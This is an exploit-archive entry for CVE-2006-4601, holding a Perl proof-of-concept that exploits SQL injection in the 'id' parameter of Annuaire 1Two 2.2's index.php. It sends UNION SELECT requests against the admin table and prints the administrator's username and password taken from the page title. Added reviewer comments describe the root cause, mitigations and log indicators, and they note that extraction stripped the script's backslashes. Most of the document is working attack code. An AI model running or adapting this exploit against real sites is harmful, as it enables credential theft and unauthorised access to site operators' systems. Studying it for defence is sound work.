Exploit: Annuaire 1Two 2.2 Remote SQL Injection Exploit ( Ascii Version )


Annuaire 1Two 2.2 Remote SQL Injection Exploit

Published: 2006.09.08
Credit: DarkFig
Risk: Medium
CWE: CWE-89
CVE: CVE-2006-4601
Local: No
Remote: Yes


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

#!/usr/bin/perl

#

# Affected.scr..: Annuaire 1Two 2.2

# Poc.ID........: 09060902.txt

# Type..........: SQL Injection (without quote)

# Risk.level....: Medium

# Vendor.Status.: Unpatched

# Src.download..: http://www.1two.org/

# Poc.link......: acid-root.new.fr/poc/09060902.txt

# Credits.......: DarkFig

#

#

# Reviewer notes (defensive reading of this proof of concept):
#
# Purpose: demonstrates the SQL injection in the "id" parameter of index.php
# by sending one GET request per column name and printing whatever text the
# response carries in its title.
#
# Root cause, as far as this listing shows: the value of "id" is extended with
# a UNION SELECT and no quote character is needed ("without quote" above),
# which suggests the application places the parameter into a numeric SQL
# context without validation -- confirm against the application source.
#
# Mitigation: treat "id" as an integer (reject anything that is not digits)
# and pass it through a parameterized query; run the application with a
# database account that cannot read the admin table from public pages; store
# admin passwords as salted hashes so a disclosed column is not directly usable.
#
# Detection: web server logs showing index.php requests whose "id" value
# contains "UNION SELECT" or the table name 1two_annuaire_admin; the fixed
# User-Agent string set below is a secondary indicator only, since a client
# can send any value there.
#
# NOTE(review): this copy appears to have lost backslashes in page extraction
# (for example "n" printed where a newline escape would be expected), so treat
# it as a reading reference, not a runnable listing.

use LWP::UserAgent;

use HTTP::Request;

use Getopt::Long;

use strict;

# Banner.
print STDOUT "n+", '-' x 53, "+n";

print STDOUT "| Annuaire 1Two 2.2 Remote SQL Injection Exploit |n";

print STDOUT '+', '-' x 53, "+n";

# Command-line settings: target host and path, plus optional HTTP proxy
# address and proxy credentials.
my($host,$path,$proxh,$proxu,$proxp,);

my $opt = GetOptions(

'host=s' => $host,

'path=s' => $path,

'proxh=s' => $proxh,

'proxu=s' => $proxu,

'proxp=s' => $proxp);

# Without a host there is nothing to do: print usage and stop.
if(!$host) {

print STDOUT "| Usage: ./xx.pl --host=[www] --path=[/] [Options] |n";

print STDOUT "| [Options] --proxh=[ip] --proxu=[user] --proxp=[pwd] |n";

print STDOUT '+', '-' x 53, "+n";

exit(0);

}

# Defaults: root path, and an http:// prefix when the value does not already
# contain "http".
if(!$path) {$path = '/';}

if($host !~ /http/) {$host = 'http://'.$host;}

if($proxh !~ /http/ && $proxh != '') {$proxh = 'http://'.$proxh.'/';}

# Column names requested, one request each.
my @fi = ('username', 'password');

# Vulnerable entry point: the "id" query parameter of index.php.
my $ur = $host.$path.'index.php?id=';

my $ua = LWP::UserAgent->new();

# Fixed User-Agent value; usable as a (weak) log indicator for this script.
$ua->agent('Mozilla XD');

$ua->timeout(30);

$ua->proxy(['http'] => $proxh) if $proxh;

foreach(@fi) {

my $xx = $_;

# The appended text is what defenders should look for in request logs:
# a negative id followed by UNION SELECT against the admin table.
my $re = HTTP::Request->new(GET => $ur."-1 UNION SELECT $xx FROM 1two_annuaire_admin");

$re->proxy_authorization_basic($proxu, $proxp) if $proxp;

my $xd = $ua->request($re);

my $da = $xd->content;

# The result is read back from the page title (text after "- " up to the
# closing title tag), i.e. the application reflects the queried row there.
if($da =~ /- (.*?)</title>/) {

if($xx eq 'username') {

print STDOUT " [+]User:";}

if($xx eq 'password') {

print STDOUT " [+]Passwd:";}

print STDOUT " $1n";

} else {

# No title match: reported as failure; the listing does not distinguish a
# patched target from a network or HTTP error.
print STDOUT "[!]Exploit failedn";

}}

print STDOUT "+", '-' x 53, "+n";

exit(0);
